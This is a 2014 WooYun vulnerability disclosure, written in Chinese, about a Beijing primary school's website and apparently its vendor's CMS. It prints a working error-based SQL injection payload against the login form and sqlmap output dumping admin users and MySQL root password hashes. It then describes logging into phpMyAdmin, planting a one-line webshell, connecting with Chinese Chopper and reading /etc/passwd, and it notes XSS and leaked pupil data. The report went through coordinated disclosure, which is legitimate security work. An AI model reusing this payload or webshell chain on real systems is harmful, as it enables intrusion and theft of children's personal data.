当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050250

漏洞标题:某几个小学各种漏洞大礼包(疑似北京乐知行软件有限公司某cms)服务器shell 信息侧漏

相关厂商:hdsyxx.net

漏洞作者: Haswell

提交时间:2014-02-04 10:49

修复时间:2014-03-21 10:50

公开时间:2014-03-21 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-04: 细节已通知厂商并且等待厂商处理中
2014-02-09: 厂商已经确认,细节仅向厂商公开
2014-02-19: 细节向核心白帽子及相关领域专家公开
2014-03-01: 细节向普通白帽子公开
2014-03-11: 细节向实习白帽子公开
2014-03-21: 细节向公众公开

简要描述:

学生狗关注wooyun好久,来拿个验证码,由于太弱太明显就在这里不多说了。。。。。。。。
据说母校官网找人开发改版了,来转悠转悠~~~~~~~~~~~~~~~~~~~--by Haswell

详细说明:

先是http://hdsyxx.net:85/phpinfo.php PHP 5.3.x < 5.3.13
各种信息的好去处
然后/admin, /includes, /icons,/session, /templates, /phpmyadmin, /eWebEditor,
/includes /icons,/session, /templates,/eWebEditor, 神马文件枚举就不说了
先看看/session

2014-02-03_234246.png


2014-02-03_234339.png


。。。我姑且先认为这是个失误。
然后hash拿到cmd5解密。。特莫第一次见管理员一位数密码。。。。
再来看后台/admin
登进去看到功能不多,貌似自己写的?

3.png


觉得这样不太光荣,回去重来。。
/ewebeditor 用户名密码admin
还没注册。。没钱帮你们注册拿shell也没细看
再回去重来
/search.php 直接吓尿

4.png


扔到sqlmap里,xx_user表里后台用户
Database: dmc20121030
Table: xx_user
[3 entries]
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| user_id | user_pass | user_name | user_type2 | user_type1 | user_email | user_email2 |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| 1 | c4ca4238a0b923820dcc509a6f75849b | 居福 | 0 | 1 | 1 | <blank> |
| 2 | a87ff679a2f3e71d9181a67b7542122c | 海淀实验小学 | 0 | 0 | 4 | <blank> |
| 4 | f4e5947fc68554c78a536a7a44e0eb22 | 海淀实验小学 | 0 | 0 | cheng | <blank> |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
因为有phpmyadmin,懒得跑了,直接--passwords
Place: POST
Parameter: user_email
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=login&user_email=a' AND (SELECT 9404 FROM(SELECT COUNT(*),CONCAT(0x7173666b71,(SELECT (CASE WHEN (9404=9404) THEN 1 ELSE 0 END)),0x716d736671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ABpM'='ABpM&user_pass=a&x=76&y=10
---
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] root [3]:
password hash: *2F82CB134B90797738744908CBAE6D08313C4686
password hash: *64705BDB659CD527A15F85992DCE56AD472B6F01
password hash: NULL
得到MySQL用户名密码
然后cmd5解密不谢
登陆phpmyadmin

5.png


导出一句话拿shell

6.png


/etc/passwd就好了
/admin还有一条路:直接

8.png


然后

9.png


再次吓尿
居然还有。。。。

17.png


对了找敏感路径还有一条路/robots.txt
Contents of robots.txt :
User-agent: *
Disallow: /admin/
Disallow: /eWebEditor/
Disallow: /images/
Disallow: /includes/
Disallow: /smtp/
Disallow: /templates/
Disallow: /templates_c/
Disallow: /uploadfile/
Disallow: /uploadimage/
Disallow: /css.css
Disallow: /style.css
xss很多,比如这里

10.png


13.png


已经有人来过了

12.png


14.png


这里当然也行。。。。

15.png


16.png


这些地方还多多少少附带注入。。。。。。
反射型一抓一大把不说了
因为有同服务器乐知行数字校园,大量祖国花朵信息外泄
同服务器的9998端口/cms今典小学官网www.bjhdjdxx.com/。。。为什么。。。。。
母校你种魔了。。。。。。。。

漏洞证明:

Database: dmc20121030
Table: xx_user
[3 entries]
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| user_id | user_pass | user_name | user_type2 | user_type1 | user_email | user_email2 |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| 1 | c4ca4238a0b923820dcc509a6f75849b | 居福 | 0 | 1 | 1 | <blank> |
| 2 | a87ff679a2f3e71d9181a67b7542122c | 海淀实验小学 | 0 | 0 | 4 | <blank> |
| 4 | f4e5947fc68554c78a536a7a44e0eb22 | 海淀实验小学 | 0 | 0 | cheng | <blank> |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
Place: POST
Parameter: user_email
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=login&user_email=a' AND (SELECT 9404 FROM(SELECT COUNT(*),CONCAT(0x7173666b71,(SELECT (CASE WHEN (9404=9404) THEN 1 ELSE 0 END)),0x716d736671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ABpM'='ABpM&user_pass=a&x=76&y=10
---
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] root [3]:
password hash: *2F82CB134B90797738744908CBAE6D08313C4686
password hash: *64705BDB659CD527A15F85992DCE56AD472B6F01
password hash: NULL

2014-02-03_234246.png


2014-02-03_234339.png


3.png


4.png


6.png


导出一句话木马

8.png


菜刀连

9.png


17.png


10.png


13.png


12.png


14.png


15.png


16.png


修复方案:

过滤,该藏起来的藏起来,降权
还有看看他咋写的

end.png

话说在最底下看到 版权所有 设计维护:北京乐知行软件有限公司,不知道cms是不是乐知行写的。。。J几个小学在用不知道算不算通用型==(估计不是)
**捉住那个码农让他回来上咱小学的计算机课。还有求下次回学校看老师不被保安驱逐。
//第一次wooyun好激动。。。。。。。==

版权声明:转载请注明来源 Haswell@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-02-09 09:32

厂商回复:

最新状态:

暂无